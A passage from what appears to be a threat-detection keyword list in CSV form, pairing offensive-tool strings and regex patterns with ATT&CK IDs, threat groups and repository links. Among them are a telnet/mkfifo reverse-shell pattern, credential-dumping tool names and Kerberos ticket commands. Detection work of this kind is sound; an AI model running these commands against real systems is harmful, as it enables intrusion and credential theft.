","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61149" "*Terminating Windows Defender?*",".{0,1000}Terminating\sWindows\sDefender\?.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","61150" "*test_beef_debugs_spec*",".{0,1000}test_beef_debugs_spec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","61153" "*test_ccache_fromKirbi*",".{0,1000}test_ccache_fromKirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61154" "*test_crawler.py*",".{0,1000}test_crawler\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","61155" "*test_invoke_bof.x64.o*",".{0,1000}test_invoke_bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - 
MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","61156" "*test_litefuzz.py*",".{0,1000}test_litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","61157" "*test_lsassy.*",".{0,1000}test_lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","61158" "*test_mitm_initialization.py*",".{0,1000}test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","61159" 
"*test_nanodump_exe*",".{0,1000}test_nanodump_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","61160" "*test_pacu_update.py*",".{0,1000}test_pacu_update\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","61161" "*test_tezos2john.py*",".{0,1000}test_tezos2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61162" "*TestConsoleApp_YSONET*",".{0,1000}TestConsoleApp_YSONET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","61164" "*Test-ContainsAmsiAstSignatures *",".{0,1000}Test\-ContainsAmsiAstSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","61165" "*Test-ContainsAmsiPSTokenSignatures -*",".{0,1000}Test\-ContainsAmsiPSTokenSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","61166" "*Test-ContainsAmsiSignatures *",".{0,1000}Test\-ContainsAmsiSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","61167" "*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","61168" "*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","61169" "*tester@egress-assess.com*",".{0,1000}tester\@egress\-assess\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection 
capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","#email","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61170" "*tester12345678@gmail.com*",".{0,1000}tester12345678\@gmail\.com.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","#email","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","61171" "*testHeapOverflow.*",".{0,1000}testHeapOverflow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61172" "*Test-HijackableDll*",".{0,1000}Test\-HijackableDll.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","61173" "*testing for SQL injection on (custom)*",".{0,1000}testing\sfor\sSQL\sinjection\son\s\(custom\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","61174" "*Testing Global Socket Relay Network*",".{0,1000}Testing\sGlobal\sSocket\sRelay\sNetwork.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","61175" "*testing.ssi.sh*",".{0,1000}testing\.ssi\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","61177" "*test-iodine.log*",".{0,1000}test\-iodine\.log.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","61178" "*TestMyPrivs.ps1*",".{0,1000}TestMyPrivs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61179" "*Test-PasswordQuality -WeakPasswordHashesSortedFile *",".{0,1000}Test\-PasswordQuality\s\-WeakPasswordHashesSortedFile\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - 
T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","61180" "*Tests communications to all of the known DNS-over-HTTPS communications providers*",".{0,1000}Tests\scommunications\sto\sall\sof\sthe\sknown\sDNS\-over\-HTTPS\scommunications\sproviders.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","61181" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","61182" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","61183" "*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","61184" "*TestWinRMMachines*",".{0,1000}TestWinRMMachines.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","61185" "*tevora-threat/SharpView/*",".{0,1000}tevora\-threat\/SharpView\/.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","61186" "*text_to_shellcode\*.exe*",".{0,1000}text_to_shellcode\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - 
TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","","N/A","","","","61187" "*TexttoExe.ps1*",".{0,1000}TexttoExe\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","61188" "*tezos2john.py*",".{0,1000}tezos2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61189" "*TF=*mkfifo * && telnet * 0<*| /bin/sh 1>*",".{0,1000}TF\=.{0,1000}mkfifo\s.{0,1000}\s\&\&\stelnet\s.{0,1000}\s0\<.{0,1000}\|\s\/bin\/sh\s1\>.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","61190" "*TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM=*",".{0,1000}TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - 
T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61191" "*TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM=*",".{0,1000}TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61192" "*tgs::ask /tgt:*",".{0,1000}tgs\:\:ask\s\/tgt\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","61193" "*tgscrack.go*",".{0,1000}tgscrack\.go.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","61194" "*tgsrepcrack.*",".{0,1000}tgsrepcrack\..{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61195" "*tgsrepcrack.py*",".{0,1000}tgsrepcrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","61196" "*TGSThief-main*",".{0,1000}TGSThief\-main.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","61197" "*TGT_backdoor_svc*",".{0,1000}TGT_backdoor_svc.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","61198" "*TGT_Monitor -EncryptionKey *",".{0,1000}TGT_Monitor\s\-EncryptionKey\s.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","61199" "*TGT_Monitor.ps1*",".{0,1000}TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61200" "*tgtdeleg /nowrap*",".{0,1000}tgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61201" "*tgtdelegation *",".{0,1000}tgtdelegation\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
